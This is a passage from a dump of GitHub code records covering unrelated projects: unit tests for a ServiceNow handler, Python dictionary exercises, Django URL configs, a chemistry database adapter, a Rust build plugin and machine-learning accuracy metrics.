weightDiff)\n break\n \n \nif (__name__ == \"__main__\"):\n main()","repo_name":"Nesquick0/Adventofcode","sub_path":"2017/07/07.py","file_name":"07.py","file_ext":"py","file_size_in_byte":2632,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"26479766787","text":"import requests\nimport pytest\nfrom os import environ\n\nfrom unittest.mock import MagicMock\nfrom runners.handlers import service_now\n\n\n@pytest.fixture\ndef with_oauth_envar():\n cid = environ.get('SA_SN_OAUTH_CLIENT_ID')\n if not cid:\n environ['SA_SN_OAUTH_CLIENT_ID'] = 'clientid'\n yield\n if not cid and 'SA_SN_OAUTH_CLIENT_ID' in environ:\n del environ['SA_SN_OAUTH_CLIENT_ID']\n\n\ndef test_handler_simpleauth():\n returned_mock = MagicMock(status_code=201)\n post_mock = MagicMock(return_value=returned_mock)\n backup_post = requests.post\n requests.post = post_mock\n\n try:\n sn_handle_return_value = service_now.handle({})\n finally:\n requests.post = backup_post\n\n post_mock.assert_called_once()\n assert sn_handle_return_value is returned_mock\n\n\ndef test_handler_oauth(with_oauth_envar):\n oauth_response = MagicMock(json=MagicMock(return_value={'access_token': '123'}))\n oauth_post = MagicMock(status_code=201, return_value=oauth_response)\n\n create_incident_post = MagicMock(\n status_code=201, json=MagicMock(return_value={'result': {'title': 'abc'}})\n )\n post_mock = MagicMock(side_effect=[oauth_post, create_incident_post])\n backup_post = requests.post\n requests.post = post_mock\n\n try:\n sn_handle_return_value = service_now.handle({'TITLE': 'abc'})\n finally:\n requests.post = backup_post\n\n assert post_mock.call_count == 2\n assert sn_handle_return_value is create_incident_post\n","repo_name":"snowflakedb/SnowAlert","sub_path":"src/runners/tests/unit/service_now_handler.py","file_name":"service_now_handler.py","file_ext":"py","file_size_in_byte":1489,"program_lang":"python","lang":"en","doc_type":"code","stars":176,"dataset":"github-code","pt":"53"} +{"seq_id":"70325587367","text":"# Exercise 1: Below are the two lists convert it into the dictionary\n# Output: {'Ten': 10, 'Twenty': 20, 'Thirty': 30}\nkeys = ['Ten', 'Twenty', 'Thirty']\nvalues = [10, 20, 30]\n\n# solution 1\ndct = dict()\nfor index in range(len(keys)):\n dct[keys[index]] = values[index]\n# solution 2\ndct = dict(zip(keys, values))\n\n\n# Exercise 2: Merge following two Python dictionaries into one\n# Output: 
{'Ten': 10, 'Twenty': 20, 'Thirty': 30, 'Fourty': 40, 'Fifty': 50}\ndict1 = {'Ten': 10, 'Twenty': 20, 'Thirty': 30}\ndict2 = {'Thirty': 30, 'Fourty': 40, 'Fifty': 50}\n\n# Solution 1\ndict1.update(dict2)\n\n# Solution 2\nkeys = set(dict1.keys())\nkeys.update(dict2.keys())\ndct = dict()\nfor k in keys:\n    dct[k] = dict1.get(k, None) or dict2.get(k, None)\nprint(dct)\n\n\n# Exercise 3: Access the value of key ‘history’ from the dictionary below\n# Output: 80\ndict_ex3 = {\n    \"class\": {\n        \"student\": {\n            \"name\": \"Mike\",\n            \"marks\": {\n                \"physics\": 70,\n                \"history\": 80\n            }\n        }\n    }\n}\n\nprint(dict_ex3[\"class\"][\"student\"][\"marks\"][\"history\"])\nprint(dict_ex3.get(\"class\", {}).get(\"student\", {}).get(\"marks\", {}).get(\"history\", None))\n\n\n# Exercise 4: Create a new dictionary by extracting the following keys from the dictionary below\n# Output: {'name': 'Kelly', 'salary': 8000}\nkeys_to_extract = [\"name\", \"salary\"]\ndict_ex4 = {\n    \"name\": \"Kelly\",\n    \"age\": 25,\n    \"salary\": 8000,\n    \"city\": \"New york\"\n}\n\n# Solution 1\nres_ex4 = dict()\nfor key in keys_to_extract:\n    res_ex4[key] = dict_ex4[key]\nprint(res_ex4)\n\n# Solution 2\nprint({k: v for k, v in dict_ex4.items() if k in keys_to_extract})\n\n\n# Exercise 5: Delete a set of keys from a dictionary\n# Output: {'city': 'New york', 'age': 25}\nkeys_to_remove = [\"name\", \"salary\"]\ndict_ex5 = {\n    \"name\": \"Kelly\",\n    \"age\": 25,\n    \"salary\": 8000,\n    \"city\": \"New york\"\n}\n\n# Solution 1\nfor key in keys_to_remove:\n    del dict_ex5[key]\nprint(dict_ex5)\n\n# Solution 2 (dict_ex5 was already mutated by Solution 1, so filter the identical dict_ex4)\nprint({k: v for k, v in dict_ex4.items() if k not in keys_to_remove})\n\n\n# Exercise 6: Check if a value 200 exists in a dictionary\n# Output: True\ndict_ex6 = {'a': 100, 'b': 200, 'c': 300}\n\n# Solution 1\nprint(200 in dict_ex6.values())\n\n# Solution 2\nexists = False\nfor value in dict_ex6.values():\n    if value == 200:\n        exists = True\n        break\nprint(exists)\n\n\n# Exercise 7: Rename key city to location in the following dictionary\n# Output: {\n#     \"name\": \"Kelly\",\n#     \"age\":25,\n#     \"salary\": 8000,\n#     \"location\": \"New york\"\n# }\ndict_ex7 = {\n    \"name\": \"Kelly\",\n    \"age\": 25,\n    \"salary\": 8000,\n    \"city\": \"New york\"\n}\n\n# Solution 1\ndict_ex7[\"location\"] = dict_ex7.pop(\"city\")\n\n# Solution 2\ntemp = dict_ex7[\"city\"] # \"New york\"\ndel dict_ex7[\"city\"]\ndict_ex7[\"location\"] = temp\n\n\n# Exercise 8: Get the key of a minimum value from the following dictionary\n# Output: Math\ndict_ex8 = {\n    'Physics': 82,\n    'Math': 65,\n    'history': 75\n}\n\n# Solution 1\n# dict.keys() is not subscriptable in Python 3, so take the first key via iter()\nmin_value_key = next(iter(dict_ex8))\nmin_value = dict_ex8[min_value_key]\nfor k, v in dict_ex8.items():\n    if v < min_value:\n        min_value_key = k\n        min_value = v\nprint(min_value_key)\nprint(min_value)\n\n\n# Exercise 9: Change Brad’s salary to 8500 from a given Python dictionary\n# Output: {\n#    'emp1': {'name': 'John', 'salary': 7500},\n#    'emp2': {'name': 'Emma', 'salary': 8000},\n#    'emp3': {'name': 'Brad', 'salary': 8500}\n# }\ndict_ex9 = {\n    'emp1': {'name': 'John', 'salary': 7500},\n    'emp2': {'name': 'Emma', 'salary': 8000},\n    'emp3': {'name': 'Brad', 'salary': 6500}\n}\n\n# Solution 1\ndict_ex9[\"emp3\"][\"salary\"] = 8500\n\n# Solution 2\nfor key, employee in dict_ex9.items(): # (key, val)\n    if employee['name'] == 'Brad':\n        employee['salary'] = 8500\n        
break\nprint(dict_ex9)\n","repo_name":"tdisbm/pythonexpress","sub_path":"exercises/dict_exercises.py","file_name":"dict_exercises.py","file_ext":"py","file_size_in_byte":3688,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"40801778710","text":"\"\"\"Unit tests for view_model.py\"\"\"\nimport pytest\nfrom todo_app.view_model import ViewModel\nfrom todo_app.item import Item\n\ndef test_todo_items():\n items = [\n Item(1, \"Test_ToDo1\", \"To Do\"),\n ]\n todo_items_list = ViewModel(items).todo_items\n assert len(todo_items_list) > 0, \"No ToDo item found\"\n\ndef test_doing_items():\n items = [\n Item(1, \"Test_Doing1\", \"Doing\"),\n ]\n doing_items_list = ViewModel(items).doing_items\n assert len(doing_items_list) > 0, \"No Doing item found\"\n\ndef test_done_items():\n items = [\n Item(1, \"Test_Done1\", \"Done\"),\n ]\n done_items_list = ViewModel(items).done_items\n assert len(done_items_list) > 0, \"No Done item found\"\n","repo_name":"jainsushma/DevOps-Course-Starter","sub_path":"tests/test_view_model.py","file_name":"test_view_model.py","file_ext":"py","file_size_in_byte":751,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"22253854837","text":"from django.conf.urls import url\n\nfrom . import views\n\napp_name = 'django_sms'\n\nurlpatterns = [\n url(\n r'^plivo/?$',\n views.PlivoWebhookView.as_view(),\n name='plivo'\n ),\n url(\n r'^twilio/?$',\n views.TwilioWebhookView.as_view(),\n name='twilio'\n ),\n]\n","repo_name":"ssprasad100/AWS-lunchbreak","sub_path":"lunchbreak/django_sms/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":303,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"52300366","text":"\"\"\"invoice_creator URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n https://docs.djangoproject.com/en/4.1/topics/http/urls/\nExamples:\nFunction views\n 1. Add an import: from my_app import views\n 2. Add a URL to urlpatterns: path('', views.home, name='home')\nClass-based views\n 1. Add an import: from other_app.views import Home\n 2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')\nIncluding another URLconf\n 1. Import the include() function: from django.urls import include, path\n 2. 
Add a URL to urlpatterns: path('blog/', include('blog.urls'))\n\"\"\"\nfrom django.contrib import admin\nfrom django.urls import include, path\n\nurlpatterns = [\n path('invoice_manager/', include('invoice_manager.urls'), name='invoice_manager'),\n path('customer_manager/', include('customer_manager.urls'), name='customer_manager'),\n path('customer_pricing_manager/', include('customer_pricing_manager.urls'), name='customer_pricing_manager'),\n path('item_manager/', include('item_manager.urls'), name='item_manager'),\n path('company_manager/', include('company_manager.urls'), name='company_manager'),\n path('', include('home.urls'), name='home'),\n path('admin/', admin.site.urls),\n]","repo_name":"inventabuild/Customer-invoice","sub_path":"invoice_creator/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1270,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"18296983202","text":"from os import listdir, remove, rmdir\nfrom os.path import join\n\nfrom indigo import IndigoObject\nfrom indigo.bingo import Bingo, BingoException\n\nfrom ..constants import DB_BINGO\nfrom ..helpers import indigo_iterator\nfrom ..logger import logger\nfrom .base import NoSQLAdapter, catch_indigo_exception\n\n\nclass BingoNoSQL(NoSQLAdapter):\n dbms = DB_BINGO\n\n def __init__(self, indigo):\n NoSQLAdapter.__init__(self)\n self.indigo = indigo\n\n def connect(self):\n logger.info(f\"Connecting to {self.dbms} DB\")\n self.bingo = Bingo.loadDatabaseFile(self.indigo, self.db_path)\n\n def close_connect(self):\n logger.info(f\"Closing connecting to {self.dbms} DB\")\n self.bingo.close()\n\n def import_data(self, data_path: str, database_type: str):\n logger.info(f\"Creating {self.dbms} database\")\n self.bingo = Bingo.createDatabaseFile(\n self.indigo, self.db_path, database_type\n )\n\n logger.info(f\"Importing data to {self.dbms} from {data_path}\")\n index = 1\n for mol in indigo_iterator(self.indigo, data_path):\n try:\n self.bingo.insert(mol, index)\n except BingoException as e:\n logger.error(\n f\"Error during import {database_type} from \"\n f\"{data_path} (id = {index}) \"\n f\"'{mol.rawData()[:20]}...': {e}\"\n )\n finally:\n index += 1\n self.close_connect()\n\n def delete_base(self):\n logger.info(f\"Dropping {self.dbms} database\")\n for db_file in listdir(join(self.db_dir, self.db_name)):\n remove(join(self.db_dir, self.db_name, db_file))\n rmdir(join(self.db_dir, self.db_name))\n\n @catch_indigo_exception()\n def mass(self, molecule: IndigoObject, weight_type: str):\n if weight_type == \"molecular-weight\":\n return molecule.molecularWeight()\n if weight_type == \"most-abundant-mass\":\n return molecule.mostAbundantMass()\n if weight_type == \"monoisotopic-mass\":\n return molecule.monoisotopicMass()\n\n @catch_indigo_exception()\n def gross(self, molecule: IndigoObject):\n return molecule.grossFormula()\n\n @catch_indigo_exception(catch_error=True)\n def exact(self, molecule, target_function=None, options=\"\"):\n result = []\n exact_matcher = self.bingo.searchExact(molecule, options)\n while exact_matcher.next():\n id = exact_matcher.getCurrentId()\n result.append(id)\n exact_matcher.close()\n return result\n\n @catch_indigo_exception(catch_error=True)\n def substructure(self, molecule, target_function=None, options=\"\"):\n result = []\n query = self.indigo.loadQueryMolecule(molecule.rawData())\n sub_matcher = self.bingo.searchSub(query, options)\n while sub_matcher.next():\n id = sub_matcher.getCurrentId()\n 
result.append(id)\n        sub_matcher.close()\n        return result\n\n    @catch_indigo_exception(catch_error=True)\n    def similarity(self, molecule, target_function=None, options=\"\"):\n        result = []\n        sim_type, min_sim, max_sim = options.split(\", \")\n        min_sim, max_sim = float(min_sim), float(max_sim)\n        sim_matcher = self.bingo.searchSim(\n            molecule, min_sim, max_sim, sim_type\n        )\n        while sim_matcher.next():\n            id = sim_matcher.getCurrentId()\n            result.append(id)\n        sim_matcher.close()\n        return result\n\n    @catch_indigo_exception(catch_error=True)\n    def smarts(self, molecule, target_function=None, options=\"\"):\n        return self.substructure(molecule, target_function, options)\n\n    @catch_indigo_exception(catch_error=True)\n    def rsmarts(self, reaction, target_function=None, options=\"\"):\n        return self.substructure(reaction, target_function, options)\n\n    @catch_indigo_exception(catch_error=True)\n    def rexact(self, reaction, target_function=None, options=\"\"):\n        result = []\n        exact_matcher = self.bingo.searchExact(reaction, options)\n        while exact_matcher.next():\n            id = exact_matcher.getCurrentId()\n            result.append(id)\n        exact_matcher.close()\n        return result\n\n    @catch_indigo_exception(catch_error=True)\n    def rsubstructure(self, reaction, target_function=None, options=\"\"):\n        result = []\n        query = self.indigo.loadQueryReaction(reaction.rawData())\n        sub_matcher = self.bingo.searchSub(query, options)\n        while sub_matcher.next():\n            id = sub_matcher.getCurrentId()\n            result.append(id)\n        sub_matcher.close()\n        return result\n","repo_name":"epam/Indigo","sub_path":"bingo/tests/dbc/BingoNoSQL.py","file_name":"BingoNoSQL.py","file_ext":"py","file_size_in_byte":4684,"program_lang":"python","lang":"en","doc_type":"code","stars":257,"dataset":"github-code","pt":"53"} +{"seq_id":"4469100031","text":"import os, glob\nimport subprocess\n\nfolder = '/media/D/Datasets/TRMM'\n# local copy overrides the external-drive path above\nfolder = '/home/cak/Desktop/Datasets/TRMM'\n\nfiles = glob.glob1(folder, '*.nc4')\n\nos.chdir(folder)\n\nfor file in files:\n    name = file[0:8]\n    # sudo cdo settaxis,2020-01-01,12:00:00,1day 3B42RT_Daily.20191231.7.nc4 set.nc\n\n    date = name[0:4] + '-' + name[4:6] + '-' + name[6:8]\n\n    code = 'cdo settaxis,{},12:00:00,1day {file} time_{file}'.format(date, file=file)\n    os.system(code)\n","repo_name":"lucabrocca78/Jupyter-lumped-models","sub_path":"Data_prep/TRMM_merge.py","file_name":"TRMM_merge.py","file_ext":"py","file_size_in_byte":459,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"33833290714","text":"from __future__ import annotations\n\nfrom contextlib import suppress\nfrom typing import NoReturn\n\nfrom ..module_utils.basic import default_arg_spec\nfrom ..module_utils.basic import default_required_if\nfrom ..module_utils.basic import init_module\nfrom ..module_utils.basic import init_sdk\nfrom ..module_utils.basic import log_grpc_error\n\nwith suppress(ImportError):\n    from google.protobuf.json_format import MessageToDict\n    from yandex.cloud.dns.v1.dns_zone_service_pb2 import CreateDnsZoneRequest\n    from yandex.cloud.dns.v1.dns_zone_service_pb2 import DeleteDnsZoneRequest\n    from yandex.cloud.dns.v1.dns_zone_service_pb2 import GetDnsZoneRequest\n    from yandex.cloud.dns.v1.dns_zone_service_pb2 import ListDnsZonesRequest\n    from yandex.cloud.dns.v1.dns_zone_service_pb2 import UpdateDnsZoneRequest\n    from yandex.cloud.dns.v1.dns_zone_service_pb2_grpc import DnsZoneServiceStub\n\n\ndef main() -> NoReturn:\n    argument_spec = default_arg_spec()\n    argument_spec.update(\n        {\n            'folder_id': {'type': 
'str'},\n            'dns_zone_id': {'type': 'str'},\n            'name': {'type': 'str'},\n            'description': {'type': 'str'},\n            'zone': {'type': 'str', 'required': True},\n            'labels': {'type': 'dict'},\n            'visibility': {\n                'type': 'dict',\n                'options': {\n                    'network_ids': {\n                        'type': 'list',\n                        'elements': 'str',\n                        'required': True,\n                    },\n                },\n            },\n            'state': {\n                'type': 'str',\n                'default': 'present',\n                'choices': ['present', 'absent'],\n            },\n        },\n    )\n    required_if = default_required_if()\n    required_one_of = [\n        ('dns_zone_id', 'name', 'folder_id'),\n    ]\n    required_by = {\n        'name': 'folder_id',\n    }\n    module = init_module(\n        argument_spec=argument_spec,\n        required_one_of=required_one_of,\n        required_by=required_by,\n        required_if=required_if,\n        supports_check_mode=True,\n    )\n    client: DnsZoneServiceStub = init_sdk(module).client(DnsZoneServiceStub)\n    result = {}\n\n    state = module.params['state']\n    dns_zone_id = module.params['dns_zone_id']\n    folder_id = module.params['folder_id']\n    name = module.params['name']\n    zone = module.params['zone']\n    kw = {\n        'name': name,\n        'description': module.params['description'],\n        'labels': module.params['labels'],\n    }\n    if module.params['visibility']:\n        kw['private_visibility'] = module.params['visibility']\n    else:\n        kw['public_visibility'] = {}\n\n    # check if the dns zone exists\n    curr_dns = None\n    with log_grpc_error(module):\n        if dns_zone_id:\n            curr_dns = client.Get(GetDnsZoneRequest(dns_zone_id=dns_zone_id))\n        else:\n            zones = client.List(ListDnsZonesRequest(folder_id=folder_id, filter=f'name=\"{name}\"')).dns_zones\n            if zones:\n                curr_dns = zones[0]\n\n    with log_grpc_error(module):\n        if state == 'present':\n            if curr_dns:\n                kw['dns_zone_id'] = dns_zone_id\n                resp = client.Update(UpdateDnsZoneRequest(**kw))\n                result.update(MessageToDict(resp))\n            else:\n                kw['folder_id'] = folder_id\n                kw['zone'] = zone\n                resp = client.Create(CreateDnsZoneRequest(**kw))\n                result.update(MessageToDict(resp))\n\n        elif state == 'absent':\n            if not curr_dns:\n                module.fail_json(f'dns zone {dns_zone_id or name} not found')\n            resp = client.Delete(DeleteDnsZoneRequest(dns_zone_id=curr_dns.id))\n            result.update(MessageToDict(resp))\n\n    module.exit_json(**result, changed=True)\n\n\nif __name__ == '__main__':\n    main()\n","repo_name":"q0w/yandex.cloud","sub_path":"plugins/modules/dns.py","file_name":"dns.py","file_ext":"py","file_size_in_byte":3867,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"25893782672","text":"# -*- coding:utf-8 -*-\n\nimport numpy as np\n\n\"\"\" One number in the array appears more than half of the array's length; find that number.\n    For example, take the length-9 input array [1,2,3,2,2,2,5,4,2].\n    The number 2 appears 5 times, more than half the array length, so the output is 2. If no such number exists, output 0.\"\"\"\n\n\"\"\" Approach: just use a dictionary to count how many times each element occurs\"\"\"\n\n\ndef find_the_num(li):\n\n    info = {}\n    length = len(li)\n    if not length:\n        return 0\n    for i in range(length):\n        if li[i] in info.keys():\n            info[li[i]] += 1\n        else:\n            info[li[i]] = 1\n\n    for k, v in info.items():\n        if v > length / 2:\n            return k\n\n    # no majority element found: output 0, as the problem statement requires\n    return 0\n\n\nif __name__ == '__main__':\n\n    a = np.array([1,2,3,2,2,2,5,4,2])\n    result = find_the_num(a)\n    print(result)","repo_name":"qtvspa/offer","sub_path":"Array/repeat_over_half.py","file_name":"repeat_over_half.py","file_ext":"py","file_size_in_byte":811,"program_lang":"python","lang":"zh","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"70479221288","text":"#!/usr/bin/python3\n\"\"\"\nTakes in a URL, sends a request to the URL and displays the value of\nthe X-Request-Id variable found in the header of the response\n\"\"\"\n\nimport requests\nimport sys\n\nif __name__ == 
\"__main__\":\n    response = requests.get(sys.argv[1])\n    header = response.headers\n    if \"X-Request-Id\" in header:\n        print(header['X-Request-Id'])\n","repo_name":"cmmolanos1/holbertonschool-higher_level_programming","sub_path":"0x11-python-network_1/5-hbtn_header.py","file_name":"5-hbtn_header.py","file_ext":"py","file_size_in_byte":356,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"5238515396","text":"\"\"\"\nEXERCISE 086: Matrix in Python\n\nWrite a program that creates a 3x3 matrix and fills it with values read from the keyboard.\n0 [_][_][_]\n1 [_][_][_]\n2 [_][_][_]\n   0  1  2\n\nAt the end, display the matrix on the screen, properly formatted.\n\"\"\"\n\nmatriz = [[],[],[]]\nfor linha in range(0,3):\n    for coluna in range(0,3):\n        numero = int(input(f'Enter a value for position ({linha}, {coluna}): '))\n        matriz[linha].append(numero)\n\n\nprint(matriz[0])\nprint(matriz[1])\nprint(matriz[2])\n","repo_name":"bruno-gs/Python","sub_path":"Curso em video/Estruturas Compostas - M3/LISTAS/ex086.py","file_name":"ex086.py","file_ext":"py","file_size_in_byte":498,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"35066136537","text":"# Author: Omkar Dixit\n# Email: omedxt@gmail.com\n\n'''\nRotate Matrix: Given an image represented by an NxN matrix, where each pixel in the image is 4\nbytes, write a method to rotate the image by 90 degrees. Can you do this in place?\n'''\n\n# Time Complexity O(n^2)\n\nimport sys\n\ndef rotateMatrix(matrix):\n    for i in range(len(matrix)):\n        for j in range(i, len(matrix)):\n            matrix[i][j], matrix[j][i] = matrix[j][i], matrix[i][j]\n    for i in range(len(matrix)):\n        matrix[i].reverse()\n    return matrix\n\n\nif __name__==\"__main__\":\n    # matrix = [\n    #     [1, -2, -6],\n    #     [0, 3, 7],\n    #     [1, -2, 5]\n    # ]\n    matrix = [\n        [1, 2, 3],\n        [4, 5, 6],\n        [7, 8, 9]\n    ]\n    # print(\"Rotating {}\".format(matrix))\n    # print(\"Done\")\n    print(rotateMatrix(matrix))","repo_name":"dixitomkar1809/Coding-Python","sub_path":"CtCi/Array&Strings/rotateMatrix.py","file_name":"rotateMatrix.py","file_ext":"py","file_size_in_byte":807,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"27269857495","text":"# 2.1\nfrom typing import List\nimport numpy as np\nfrom scipy.integrate import odeint\nimport matplotlib.pyplot as plt\n\n# 2.2\nRESOLUTION = 100\n\ndef model(y: np.ndarray, t:float) -> List:\n    return [t**2]\n\n# 2.3\nt = np.linspace(0, 10, RESOLUTION)\n\nres_n = odeint(model, [0], t)\n\n# 2.4\nres_a = t**3/3\n\nplt.plot(t, res_n, linewidth=5, alpha=0.5)\nplt.plot(t, res_a)\nplt.title(\"comparison of numerical and analytical solution\")\nplt.legend(['numeric', 'analytical'])\nplt.xlabel(\"t\")\nplt.show()\nplt.close()","repo_name":"cozajeden/Podstawy_Sterowania_Optymalnego","sub_path":"lab8_2.py","file_name":"lab8_2.py","file_ext":"py","file_size_in_byte":497,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"2566559865","text":"from subprocess import run\nfrom .Base import plugin, BasePlugin, PluginSupport\n\n\n@plugin\nclass RustPlugin(BasePlugin):\n    def build(self, settings):\n        \"\"\"compiles the source code or a subset thereof\"\"\"\n        return run(\n            [\"cargo\", \"build\", *settings[\"cmdline_build\"].value],\n            cwd=settings[\"repo_base\"].value,\n        ).returncode\n\n    def test(self, settings):\n        \"\"\"runs automated tests on the source code or a subset thereof\"\"\"\n        return run(\n            [\"cargo\", \"test\", *settings[\"cmdline_test\"].value],\n            cwd=settings[\"repo_base\"].value,\n        ).returncode\n\n    def clean(self, settings):\n        \"\"\"removes build artifacts\"\"\"\n        return run([\"cargo\", \"clean\"], cwd=settings[\"repo_base\"].value).returncode\n\n    def install(self, settings):\n        \"\"\"builds and installs the binary\"\"\"\n        return run(\n            [\"cargo\", \"install\", \"--path\", \".\", *settings[\"cmdline_install\"].value],\n            cwd=settings[\"repo_base\"].value,\n        ).returncode\n\n    def run(self, settings):\n        \"\"\"runs the binary\"\"\"\n        return run(\n            [\"cargo\", \"run\", *settings[\"cmdline_run\"].value],\n            cwd=settings[\"repo_base\"].value,\n        ).returncode\n\n    def format(self, settings):\n        \"\"\"formats the source code\"\"\"\n        return run(\n            [\"cargo\", \"fmt\", *settings[\"cmdline_format\"].value],\n            cwd=settings[\"repo_base\"].value,\n        ).returncode\n\n    def tidy(self, settings):\n        \"\"\"checks the source code for errors\"\"\"\n        return run(\n            [\"cargo\", \"check\", *settings[\"cmdline_tidy\"].value],\n            cwd=settings[\"repo_base\"].value,\n        ).returncode\n\n    def bench(self, settings):\n        \"\"\"runs benchmarks\"\"\"\n        return run(\n            [\"cargo\", \"bench\", *settings[\"cmdline_bench\"].value],\n            cwd=settings[\"repo_base\"].value,\n        ).returncode\n\n    def generate(self, settings):\n        \"\"\"generates a new cargo project\"\"\"\n        return run(\n            [\"cargo\", \"init\", *settings[\"cmdline_generate\"].value],\n            cwd=settings[\"repo_base\"].value,\n        ).returncode\n\n    @staticmethod\n    def _supported(settings):\n        \"\"\"returns a dictionary of supported functions\"\"\"\n        if (\n            \"repo_base\" in settings\n            and (settings[\"repo_base\"].value / \"Cargo.toml\").exists()\n        ):\n            state = PluginSupport.DEFAULT_MAIN\n            install_state = PluginSupport.NOT_ENABLED_BY_DEFAULT\n        else:\n            state = PluginSupport.NOT_ENABLED_BY_REPOSITORY\n            install_state = PluginSupport.NOT_ENABLED_BY_REPOSITORY\n\n        return {\n            \"build\": state,\n            \"test\": state,\n            \"clean\": state,\n            \"install\": install_state,\n            \"run\": state,\n            \"format\": state,\n            \"tidy\": state,\n            \"bench\": state,\n            \"generate\": PluginSupport.NOT_ENABLED_BY_DEFAULT,\n        }\n","repo_name":"robertu94/m","sub_path":"m/plugins/Rust.py","file_name":"Rust.py","file_ext":"py","file_size_in_byte":2895,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"} +{"seq_id":"22624122540","text":"import numpy as np\nimport torch\nfrom sklearn.metrics import normalized_mutual_info_score as NmiMetric\nfrom sklearn.metrics import matthews_corrcoef as MccMetric\nimport os, json\n\n\ndef shot_acc(preds, labels, train_data, many_shot_thr=100, low_shot_thr=20, acc_per_cls=False):\n    \n    if isinstance(train_data, np.ndarray):\n        training_labels = np.array(train_data).astype(int)\n    else:\n        training_labels = np.array(train_data.dataset.labels).astype(int)\n\n    if isinstance(preds, torch.Tensor):\n        preds = preds.detach().cpu().numpy()\n        labels = labels.detach().cpu().numpy()\n    elif isinstance(preds, np.ndarray):\n        pass\n    else:\n        raise TypeError('Type ({}) of preds not supported'.format(type(preds)))\n    train_class_count = []\n    test_class_count = []\n    class_correct = []\n    for l in np.unique(labels):\n        train_class_count.append(len(training_labels[training_labels == l]))\n        test_class_count.append(len(labels[labels == l]))\n        class_correct.append((preds[labels == l] == labels[labels == l]).sum())\n\n    many_shot = []\n    median_shot = []\n    low_shot = []\n    for i in range(len(train_class_count)):\n        if train_class_count[i] > many_shot_thr:\n            
many_shot.append((class_correct[i] / test_class_count[i]))\n elif train_class_count[i] < low_shot_thr:\n low_shot.append((class_correct[i] / test_class_count[i]))\n else:\n median_shot.append((class_correct[i] / test_class_count[i])) \n \n if len(many_shot) == 0:\n many_shot.append(0)\n if len(median_shot) == 0:\n median_shot.append(0)\n if len(low_shot) == 0:\n low_shot.append(0)\n\n if acc_per_cls:\n class_accs = [c / cnt for c, cnt in zip(class_correct, test_class_count)] \n return np.mean(many_shot), np.mean(median_shot), np.mean(low_shot), class_accs\n else:\n return np.mean(many_shot), np.mean(median_shot), np.mean(low_shot)\n\ndef weighted_shot_acc (preds, labels, ws, train_data, many_shot_thr=100, low_shot_thr=20):\n \n training_labels = np.array(train_data.dataset.labels).astype(int)\n\n if isinstance(preds, torch.Tensor):\n preds = preds.detach().cpu().numpy()\n labels = labels.detach().cpu().numpy()\n elif isinstance(preds, np.ndarray):\n pass\n else:\n raise TypeError('Type ({}) of preds not supported'.format(type(preds)))\n train_class_count = []\n test_class_count = []\n class_correct = []\n for l in np.unique(labels):\n train_class_count.append(len(training_labels[training_labels == l]))\n test_class_count.append(ws[labels==l].sum())\n class_correct.append(((preds[labels==l] == labels[labels==l]) * ws[labels==l]).sum())\n\n many_shot = []\n median_shot = []\n low_shot = []\n for i in range(len(train_class_count)):\n if train_class_count[i] > many_shot_thr:\n many_shot.append((class_correct[i] / test_class_count[i]))\n elif train_class_count[i] < low_shot_thr:\n low_shot.append((class_correct[i] / test_class_count[i]))\n else:\n median_shot.append((class_correct[i] / test_class_count[i])) \n return np.mean(many_shot), np.mean(median_shot), np.mean(low_shot)\n\n\n\ndef mcc_mni_metrics(preds, labels):\n return MccMetric(labels, preds), NmiMetric(labels, preds)\n\n\n\n\n\ndef class_count (data):\n labels = np.array(data.dataset.labels)\n class_data_num = []\n for l in np.unique(labels):\n class_data_num.append(len(labels[labels == l]))\n return class_data_num\n\n\nclass SummaryMeter(object):\n def __init__(self, summary_interval, data_type):\n self.summary_interval = summary_interval\n self.values = None\n self.index = 0\n self.data_type = data_type\n assert data_type in [\"scalar\", \"hist\"]\n \n def add(self, d, writer):\n if self.values is None:\n self.values = {k:[v] for k,v in d.items()}\n size = 1\n else:\n size = None\n for k,v in d.items():\n self.values[k].append(v)\n size = len(self.values[k])\n \n if size >= self.summary_interval:\n for k,v in self.values.items():\n if self.data_type == \"scalar\":\n writer.add_scalar(\n k, np.mean(v), self.index)\n elif self.data_type == \"hist\":\n writer.add_histogram(\n k, v[-1], self.index)\n\n self.values = None\n self.index += 1\n","repo_name":"silicx/DLSA","sub_path":"utils/metrics.py","file_name":"metrics.py","file_ext":"py","file_size_in_byte":4553,"program_lang":"python","lang":"en","doc_type":"code","stars":15,"dataset":"github-code","pt":"53"} +{"seq_id":"8228219012","text":"import numpy as np\r\nimport cv2\r\nimport math\r\nimport pyflow\r\nimport time\r\nimport matplotlib.pyplot as plt\r\n\r\nfrom Lidar_tools import polar_to_cartesian, find_lidar_theta_phi_from_coord_Ma\r\n\r\n\r\n\r\ndef test_show_lidar_line(image_now_cut, points, focus):\r\n for point in points:\r\n camera_coord_x1 = point[0]\r\n camera_coord_y1 = point[1]\r\n camera_coord_z1 = point[2]\r\n camera_coord_x2 = point[3]\r\n camera_coord_y2 = 
